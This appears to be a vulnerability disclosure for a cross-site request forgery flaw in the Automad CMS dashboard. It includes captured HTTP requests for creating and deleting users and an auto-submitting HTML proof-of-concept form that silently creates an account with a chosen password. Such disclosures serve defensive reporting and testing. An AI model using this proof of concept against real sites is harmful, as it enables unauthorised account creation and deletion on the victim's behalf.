Skip to content

Latest commit

 

History

History

Cross-Site Request Forgery (CSRF)

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Cross-Site Request Forgery (CSRF)

After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks.

This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user

POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd

CSRF HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
      <input type="hidden" name="username" value="User" />
      <input type="hidden" name="email" value="User&#64;example&#46;com" />
      <input type="hidden" name="password1" value="Passw0rd" />
      <input type="hidden" name="password2" value="Passw0rd" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Untitled

Untitled 1

Delete Users:

POST /dashboard?controller=UserCollection::edit HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

delete%5B%5D=User